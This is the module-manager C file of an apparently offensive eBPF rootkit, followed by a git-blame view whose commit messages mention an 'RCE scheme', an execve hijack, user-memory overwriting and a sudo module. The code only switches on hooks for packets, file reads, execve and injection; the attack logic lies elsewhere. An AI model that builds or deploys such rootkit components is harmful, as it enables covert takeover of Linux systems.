src/user/include/modules/module_manager.c

#include "module_manager.h"
#include "xdp.h"
#include "sched.h"
#include "fs.h"
#include "exec.h"
#include "injection.h"

module_config_t module_config = {
    .xdp_module = {
        .all = ON,
        .xdp_receive = OFF
    },
    .sched_module = {
        .all = ON,
        .handle_sched_process_exec = OFF
    },
    .fs_module = {
        .all = ON,
        .tp_sys_enter_read = OFF,
        .tp_sys_exit_read = OFF,
        .tp_sys_enter_openat = OFF
    },
    .exec_module = {
        .all = ON,
        .tp_sys_enter_execve = OFF
    },
    .injection_module = {
        .all = ON,
        .uprobe_execute_command = OFF
    }

};

module_config_attr_t module_config_attr = {
    .skel = NULL,
    .xdp_module = {
        .ifindex = -1,
        .flags = -1
    },
    .sched_module = {},
    .fs_module = {},
    .exec_module = {},
    .injection_module = {}
};


int setup_all_modules(){
    //Alias
    module_config_t config = module_config;
    module_config_attr_t attr = module_config_attr;
    int ret;

    //XDP
    if(config.xdp_module.all == ON){
        ret = attach_xdp_all(attr.skel, attr.xdp_module.ifindex, attr.xdp_module.flags);
    }else{
        if(config.xdp_module.xdp_receive == ON) ret = attach_xdp_receive(attr.skel, attr.xdp_module.ifindex, attr.xdp_module.flags);
    }
    if(ret!=0) return -1;

    //SCHED
    if(config.sched_module.all == ON){
        ret = attach_sched_all(attr.skel);
    }else{
        if(config.sched_module.handle_sched_process_exec == ON) ret = attach_handle_sched_process_exec(attr.skel);
    }
    if(ret!=0) return -1;

    //FS (File system)
    if(config.fs_module.all == ON){
        ret = attach_fs_all(attr.skel);
    }else{
        if(config.fs_module.tp_sys_enter_read == ON) ret = attach_tp_sys_enter_read(attr.skel);
        if(config.fs_module.tp_sys_exit_read == ON) ret = attach_tp_sys_exit_read(attr.skel);
        if(config.fs_module.tp_sys_enter_openat == ON) ret = attach_tp_sys_enter_openat(attr.skel);
    }
    if(ret!=0) return -1;

    //EXEC
    if(config.exec_module.all == ON){
        ret = attach_exec_all(attr.skel);
    }else{
        if(config.exec_module.tp_sys_enter_execve == ON) ret = attach_tp_sys_enter_execve(attr.skel);
    }
    if(ret!=0) return -1;

    //INJECTION
    if(config.injection_module.all == ON){
        ret = attach_injection_all(attr.skel);
    }else{
        if(config.injection_module.uprobe_execute_command == ON) ret = attach_uprobe_execute_command(attr.skel);
    }
    if(ret!=0) return -1;

    return 0;
}
Included a global config struct for controlling which hooks and functions of the rootkit should be active. Still work to be done in the bpf side 2021-12-31 09:54:47 -05:00			`#include "module_manager.h"`
Completed configuration module which enables to change the running ebpf modules in the rootkit at runtime. Minor changes and updated code structure 2022-01-04 13:26:13 -05:00			`#include "xdp.h"`
			`#include "sched.h"`
[BUILD IS FAILING] Added file system hooks and other improvements. Uploading because of needing to backup 2022-01-04 20:09:59 -05:00			`#include "fs.h"`
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00			`#include "exec.h"`
Successfully added uprobes calculation and hooking at arbitrary function of execve_hijack. 2022-03-03 05:53:51 -05:00			`#include "injection.h"`
Included a global config struct for controlling which hooks and functions of the rootkit should be active. Still work to be done in the bpf side 2021-12-31 09:54:47 -05:00
			`module_config_t module_config = {`
			`.xdp_module = {`
			`.all = ON,`
Completed configuration module which enables to change the running ebpf modules in the rootkit at runtime. Minor changes and updated code structure 2022-01-04 13:26:13 -05:00			`.xdp_receive = OFF`
Included a global config struct for controlling which hooks and functions of the rootkit should be active. Still work to be done in the bpf side 2021-12-31 09:54:47 -05:00			`},`
			`.sched_module = {`
			`.all = ON,`
Completed configuration module which enables to change the running ebpf modules in the rootkit at runtime. Minor changes and updated code structure 2022-01-04 13:26:13 -05:00			`.handle_sched_process_exec = OFF`
[BUILD IS FAILING] Added file system hooks and other improvements. Uploading because of needing to backup 2022-01-04 20:09:59 -05:00			`},`
			`.fs_module = {`
			`.all = ON,`
Updated function and configurator manager names to the used hook. 2022-01-26 13:04:23 -05:00			`.tp_sys_enter_read = OFF,`
Added new hooks and updated map fields to support new sudo module. 2022-02-05 13:49:20 -05:00			`.tp_sys_exit_read = OFF,`
			`.tp_sys_enter_openat = OFF`
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00			`},`
			`.exec_module = {`
			`.all = ON,`
			`.tp_sys_enter_execve = OFF`
Successfully added uprobes calculation and hooking at arbitrary function of execve_hijack. 2022-03-03 05:53:51 -05:00			`},`
			`.injection_module = {`
			`.all = ON,`
			`.uprobe_execute_command = OFF`
Included a global config struct for controlling which hooks and functions of the rootkit should be active. Still work to be done in the bpf side 2021-12-31 09:54:47 -05:00			`}`
[BUILD IS FAILING] Added file system hooks and other improvements. Uploading because of needing to backup 2022-01-04 20:09:59 -05:00
Included a global config struct for controlling which hooks and functions of the rootkit should be active. Still work to be done in the bpf side 2021-12-31 09:54:47 -05:00			`};`
Completed configuration module which enables to change the running ebpf modules in the rootkit at runtime. Minor changes and updated code structure 2022-01-04 13:26:13 -05:00
			`module_config_attr_t module_config_attr = {`
			`.skel = NULL,`
			`.xdp_module = {`
			`.ifindex = -1,`
			`.flags = -1`
			`},`
Added new probe to read the previously extracted params and overwrite user memory. Still now fully working, just a backup 2022-01-14 22:05:08 -05:00			`.sched_module = {},`
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00			`.fs_module = {},`
Successfully added uprobes calculation and hooking at arbitrary function of execve_hijack. 2022-03-03 05:53:51 -05:00			`.exec_module = {},`
			`.injection_module = {}`
Completed configuration module which enables to change the running ebpf modules in the rootkit at runtime. Minor changes and updated code structure 2022-01-04 13:26:13 -05:00			`};`


			`int setup_all_modules(){`
			`//Alias`
			`module_config_t config = module_config;`
			`module_config_attr_t attr = module_config_attr;`
			`int ret;`

			`//XDP`
			`if(config.xdp_module.all == ON){`
			`ret = attach_xdp_all(attr.skel, attr.xdp_module.ifindex, attr.xdp_module.flags);`
			`}else{`
			`if(config.xdp_module.xdp_receive == ON) ret = attach_xdp_receive(attr.skel, attr.xdp_module.ifindex, attr.xdp_module.flags);`
			`}`
			`if(ret!=0) return -1;`

			`//SCHED`
			`if(config.sched_module.all == ON){`
			`ret = attach_sched_all(attr.skel);`
			`}else{`
			`if(config.sched_module.handle_sched_process_exec == ON) ret = attach_handle_sched_process_exec(attr.skel);`
			`}`
			`if(ret!=0) return -1;`

[BUILD IS FAILING] Added file system hooks and other improvements. Uploading because of needing to backup 2022-01-04 20:09:59 -05:00			`//FS (File system)`
			`if(config.fs_module.all == ON){`
			`ret = attach_fs_all(attr.skel);`
			`}else{`
Updated function and configurator manager names to the used hook. 2022-01-26 13:04:23 -05:00			`if(config.fs_module.tp_sys_enter_read == ON) ret = attach_tp_sys_enter_read(attr.skel);`
			`if(config.fs_module.tp_sys_exit_read == ON) ret = attach_tp_sys_exit_read(attr.skel);`
Added new hooks and updated map fields to support new sudo module. 2022-02-05 13:49:20 -05:00			`if(config.fs_module.tp_sys_enter_openat == ON) ret = attach_tp_sys_enter_openat(attr.skel);`
[BUILD IS FAILING] Added file system hooks and other improvements. Uploading because of needing to backup 2022-01-04 20:09:59 -05:00			`}`
			`if(ret!=0) return -1;`

Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00			`//EXEC`
			`if(config.exec_module.all == ON){`
			`ret = attach_exec_all(attr.skel);`
			`}else{`
			`if(config.exec_module.tp_sys_enter_execve == ON) ret = attach_tp_sys_enter_execve(attr.skel);`
			`}`
			`if(ret!=0) return -1;`

Successfully added uprobes calculation and hooking at arbitrary function of execve_hijack. 2022-03-03 05:53:51 -05:00			`//INJECTION`
			`if(config.injection_module.all == ON){`
			`ret = attach_injection_all(attr.skel);`
			`}else{`
			`if(config.injection_module.uprobe_execute_command == ON) ret = attach_uprobe_execute_command(attr.skel);`
			`}`
			`if(ret!=0) return -1;`
Completed configuration module which enables to change the running ebpf modules in the rootkit at runtime. Minor changes and updated code structure 2022-01-04 13:26:13 -05:00
			`return 0;`
			`}`